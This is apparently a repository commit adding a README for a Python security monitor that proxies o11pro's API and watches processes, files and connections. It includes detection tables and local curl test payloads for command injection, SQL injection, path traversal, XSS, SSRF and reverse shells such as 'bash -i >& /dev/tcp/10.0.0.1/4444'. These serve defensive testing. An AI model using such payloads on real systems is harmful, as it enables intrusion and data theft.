mirror of
https://github.com/Ap0dexMe0/o11pro-unpacked.git
synced 2026-07-15 18:30:02 +02:00
released v1.3.2
This commit is contained in:
@@ -0,0 +1,267 @@
|
||||
# Security Monitoring Tools
|
||||
|
||||
Real-time attack detection for `o11pro`. Monitors HTTP traffic, network connections, file access, and child processes all logged to `audit.log`.
|
||||
|
||||
## Files
|
||||
|
||||
| File | Purpose |
|
||||
|------|---------|
|
||||
| `modules/monitoring.py` | Main monitoring script (Python, no external deps) |
|
||||
| `audit.log` | All events (INFO and above) created at runtime |
|
||||
| `audit_alerts.log` | HIGH/CRITICAL events only created at runtime |
|
||||
|
||||
## Quick start
|
||||
|
||||
```bash
|
||||
# All-in-one: start o11pro + HLS proxy + security monitor
|
||||
MONITOR=true ./RunMe.sh
|
||||
|
||||
# Point your client at the monitor proxy instead of the real API:
|
||||
# Instead of: http://localhost:19999/api/...
|
||||
# Use: http://localhost:19998/api/...
|
||||
```
|
||||
|
||||
All HTTP requests/responses passing through the proxy are scanned for attacks. Process activity (child processes, file access, network connections) is also monitored via `/proc`.
|
||||
|
||||
## Usage
|
||||
|
||||
```bash
|
||||
# Integrated mode (via RunMe.sh)
|
||||
MONITOR=true ./RunMe.sh
|
||||
|
||||
# Direct invocation
|
||||
python3 modules/monitoring.py --proxy-mode
|
||||
|
||||
# Monitor a specific PID
|
||||
python3 modules/monitoring.py --pid 12345
|
||||
|
||||
# Custom proxy port
|
||||
python3 modules/monitoring.py --proxy-mode --proxy-port 8080 --target-port 19999
|
||||
|
||||
# Custom log location
|
||||
python3 modules/monitoring.py --log logs/audit.log --alerts logs/audit_alerts.log
|
||||
|
||||
# One-shot scan (run once and exit)
|
||||
python3 modules/monitoring.py --once
|
||||
|
||||
# Disable process or file monitoring
|
||||
python3 modules/monitoring.py --no-proc # HTTP proxy only
|
||||
python3 modules/monitoring.py --no-files # No file watching
|
||||
```
|
||||
|
||||
## What it detects
|
||||
|
||||
### HTTP traffic (via proxy)
|
||||
|
||||
| Category | Severity | Examples detected |
|
||||
|----------|----------|-------------------|
|
||||
| **Command injection** | CRITICAL | `;cat /etc/passwd`, `$(cmd)`, `` `cmd` ``, `bash -i >&`, `/dev/tcp/`, `| sh`, `&& wget` |
|
||||
| **SQL injection** | HIGH | `' OR '1'='1`, `UNION SELECT`, `xp_cmdshell`, `DROP TABLE`, `INTO OUTFILE`, `SLEEP()`, `--` |
|
||||
| **Path traversal** | HIGH | `../`, `..\\`, `%2e%2e%2f`, `....//`, `/etc/passwd`, `~/.ssh`, null bytes |
|
||||
| **XSS** | MEDIUM | `<script>`, `javascript:`, `onerror=`, `<iframe>`, `document.cookie`, `eval(` |
|
||||
| **SSRF** | HIGH | `169.254.169.254` (AWS metadata), `127.0.0.1`, `10.x.x.x`, `192.168.x.x`, `file://`, `gopher://` |
|
||||
| **Credential exfil** | HIGH | `Bearer` tokens, `Authorization` headers, API keys, JWTs, AWS keys, GitHub tokens |
|
||||
| **Reverse shell** | CRITICAL | `bash -i >& /dev/tcp/`, `nc -e /bin/`, `python -c ... socket`, `mkfifo /tmp/` |
|
||||
|
||||
### Process activity (via /proc)
|
||||
|
||||
| Category | Severity | Examples detected |
|
||||
|----------|----------|-------------------|
|
||||
| **Suspicious child process** | CRITICAL | `sh`, `bash`, `nc`, `ncat`, `curl`, `wget`, `python -c`, `perl -e`, `chmod +x`, `kill -9` |
|
||||
| **Suspicious file access** | HIGH | `/etc/passwd`, `/etc/shadow`, `~/.ssh/`, `authorized_keys`, `/proc/self/environ`, `.bash_history` |
|
||||
| **SSRF internal IP** | HIGH | Connections to `127.0.0.1`, `10.x.x.x`, `192.168.x.x`, `172.16-31.x.x` |
|
||||
| **Unexpected port** | MEDIUM | Connections to ports other than 80, 443, 89, 53 |
|
||||
| **Potential exfiltration** | HIGH | >100 MB outbound transfer in 2 seconds |
|
||||
| **New connection** | INFO | Any new outbound TCP connection (logged for audit trail) |
|
||||
| **File changes** | MEDIUM | Changes to `keys.txt`, `o11.cfg`, `providers/sample.cfg` |
|
||||
| **New files in hls/logs** | LOW | Any new file created in watched directories |
|
||||
|
||||
## Log format
|
||||
|
||||
Both `audit.log` and `audit_alerts.log` are JSONL (one JSON object per line):
|
||||
|
||||
```json
|
||||
{
|
||||
"timestamp": "2026-06-17T21:28:30.123456+00:00",
|
||||
"type": "attack_command_injection",
|
||||
"severity": "CRITICAL",
|
||||
"source": "http",
|
||||
"details": "reverse shell bash -i: matched 'bash -i >&' in request body",
|
||||
"raw": "{\"username\":\"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\",\"password\":\"x\"}"
|
||||
}
|
||||
```
|
||||
|
||||
| Field | Description |
|
||||
|-------|-------------|
|
||||
| `timestamp` | UTC ISO 8601 timestamp |
|
||||
| `type` | Event type (e.g., `attack_command_injection`, `suspicious_process`, `connection`) |
|
||||
| `severity` | `INFO`, `LOW`, `MEDIUM`, `HIGH`, or `CRITICAL` |
|
||||
| `source` | Where the event was detected: `http`, `proc`, `net`, `file`, `child` |
|
||||
| `details` | Human-readable description |
|
||||
| `raw` | Raw input that triggered the detection (first 1000 chars, for HTTP events) |
|
||||
|
||||
## Log rotation
|
||||
|
||||
Logs auto-rotate at 100 MB, keeping 5 historical files:
|
||||
- `audit.log` → `audit.log.1` → `audit.log.2` → ... → `audit.log.5`
|
||||
|
||||
## Architecture
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────┐
|
||||
│ monitoring.py │
|
||||
│ │
|
||||
Client ───────────┤──► HTTP Proxy (:19998) │
|
||||
(browser/curl) │ ├─ scan URL │
|
||||
│ ├─ scan headers │
|
||||
│ ├─ scan body (request) │
|
||||
│ └─ scan body (response) │
|
||||
│ │ │
|
||||
│ ▼ (forward) │
|
||||
│ o11pro (:19999) │
|
||||
│ │
|
||||
│ Process Monitor (/proc/<pid>) │
|
||||
│ ├─ child processes │
|
||||
│ ├─ open files (FDs) │
|
||||
│ ├─ network connections │
|
||||
│ ├─ I/O stats (exfil detect) │
|
||||
│ └─ child cmdlines │
|
||||
│ │
|
||||
│ File Watcher │
|
||||
│ ├─ keys.txt │
|
||||
│ ├─ o11.cfg │
|
||||
│ ├─ providers/sample.cfg │
|
||||
│ ├─ logs/ │
|
||||
│ └─ hls/ │
|
||||
│ │
|
||||
└──────────┬──────────┬───────────────┘
|
||||
│ │
|
||||
audit.log audit_alerts.log
|
||||
(all) (HIGH/CRITICAL)
|
||||
```
|
||||
|
||||
## Tuning
|
||||
|
||||
### Adjust scan interval (default: 2 seconds)
|
||||
|
||||
Edit `SCAN_INTERVAL` in `modules/monitoring.py`:
|
||||
- Lower (0.5-1.0) = more responsive but more CPU
|
||||
- Higher (5-10) = less CPU but slower detection
|
||||
|
||||
### Adjust exfiltration threshold (default: 100 MB per interval)
|
||||
|
||||
Edit `EXFIL_THRESHOLD`:
|
||||
- Lower (10 MB) = more sensitive (may false-positive on legit stream traffic)
|
||||
- Higher (500 MB) = less sensitive
|
||||
|
||||
### Add suspicious IPs
|
||||
|
||||
Edit `SUSPICIOUS_IPS` in `modules/monitoring.py`:
|
||||
```python
|
||||
SUSPICIOUS_IPS = {
|
||||
'1.2.3.4', # known bad IP
|
||||
'5.6.7.8',
|
||||
}
|
||||
```
|
||||
|
||||
### Adjust expected ports (default: 80, 443, 89, 53)
|
||||
|
||||
Edit `EXPECTED_PORTS`:
|
||||
```python
|
||||
EXPECTED_PORTS = {80, 443, 89, 53, 8080}
|
||||
```
|
||||
|
||||
### Adjust expected CDN domains
|
||||
|
||||
Edit `EXPECTED_DOMAINS` to whitelist your provider's CDNs (reduces false positives on the "new connection" alerts).
|
||||
|
||||
## Testing
|
||||
|
||||
Verify the monitor detects attacks by sending test payloads through the proxy:
|
||||
|
||||
```bash
|
||||
# Command injection
|
||||
curl -X POST http://localhost:19998/api/login \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"username":"admin;cat /etc/passwd","password":"x"}'
|
||||
|
||||
# SQL injection
|
||||
curl -X POST http://localhost:19998/api/login \
|
||||
-H "Content-Type: application/json" \
|
||||
-d "{\"username\":\"admin' OR '1'='1\",\"password\":\"x\"}"
|
||||
|
||||
# Path traversal
|
||||
curl http://localhost:19998/static/../../../etc/passwd
|
||||
|
||||
# XSS
|
||||
curl -X POST http://localhost:19998/api/login \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"username":"<script>alert(1)</script>","password":"x"}'
|
||||
|
||||
# SSRF (AWS metadata)
|
||||
curl "http://localhost:19998/api/proxy?url=http://169.254.169.254/latest/meta-data/"
|
||||
|
||||
# Reverse shell
|
||||
curl -X POST http://localhost:19998/api/login \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"username":"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1","password":"x"}'
|
||||
|
||||
# Check the logs
|
||||
cat audit_alerts.log
|
||||
```
|
||||
|
||||
## Interpreting the logs
|
||||
|
||||
### High-severity alerts to investigate immediately
|
||||
|
||||
| Alert type | What it means | Action |
|
||||
|------------|---------------|--------|
|
||||
| `attack_reverse_shell` | Someone tried to spawn a reverse shell via the API | Block the source IP, investigate the request |
|
||||
| `attack_command_injection` | Shell command injection attempted | Block the source IP, check if the command executed |
|
||||
| `suspicious_process` | The o11 binary spawned `sh`, `bash`, `nc`, etc. | **Critical** may indicate the binary is compromised |
|
||||
| `suspicious_file_access` | The binary opened `/etc/passwd`, `~/.ssh`, etc. | Investigate may indicate credential theft |
|
||||
| `potential_exfil` | >100 MB sent outbound in 2 seconds | Check if legitimate (streaming) or exfiltration |
|
||||
| `ssrf_internal` | Connection to internal/private IP | Check if legitimate (DB) or SSRF attack |
|
||||
|
||||
### Lower-severity events to monitor
|
||||
|
||||
| Alert type | What it means |
|
||||
|------------|---------------|
|
||||
| `attack_xss` | XSS payload in request check if reflected in response |
|
||||
| `attack_sql_injection` | SQLi payload check if the API is vulnerable |
|
||||
| `attack_path_traversal` | Path traversal attempted check if file was accessed |
|
||||
| `attack_credential_exfil` | Credentials in request may be legitimate auth or exfil |
|
||||
| `unexpected_port` | Connection to non-standard port may be legitimate |
|
||||
| `file_change` | Config file modified verify it was authorized |
|
||||
|
||||
## Limitations
|
||||
|
||||
1. **No TLS inspection** the proxy can only scan HTTP, not HTTPS. For HTTPS, configure the o11 binary to use HTTP internally and terminate TLS at a reverse proxy (nginx) that forwards to the monitor.
|
||||
|
||||
2. **Process monitoring is polling-based** fast-lived child processes (<2 seconds) may be missed. Lower `SCAN_INTERVAL` for better coverage.
|
||||
|
||||
3. **No memory inspection** the monitor can't see what's in the process's memory (would need `gdb` or `ptrace`). It only sees file descriptors, network connections, and child processes.
|
||||
|
||||
4. **False positives** the "shell metacharacter" rule is aggressive (matches `;`, `|`, `&`, `$`, `(`, `)`). Legitimate requests containing these characters will trigger alerts. Tune the regex in `ATTACK_SIGNATURES` if needed.
|
||||
|
||||
5. **Single-process monitoring** only monitors one PID. If the o11 binary spawns helper processes that make their own connections, those won't be tracked unless you monitor the children too.
|
||||
|
||||
## Integration with RunMe.sh
|
||||
|
||||
For a fully monitored deployment:
|
||||
|
||||
```bash
|
||||
# All-in-one: o11pro + HLS proxy + security monitor
|
||||
MONITOR=true ./RunMe.sh 19999 2
|
||||
|
||||
# Watch the alerts in real-time (in another terminal)
|
||||
tail -f logs/audit_alerts.log | python3 -c "
|
||||
import json, sys
|
||||
for line in sys.stdin:
|
||||
d = json.loads(line)
|
||||
print(f\"[{d['severity']}] {d['type']}: {d['details']}\")
|
||||
"
|
||||
|
||||
# Use port 19998 for all client access (instead of 19999)
|
||||
# The monitor will scan every request and response through the proxy
|
||||
```
|
||||
Reference in New Issue
Block a user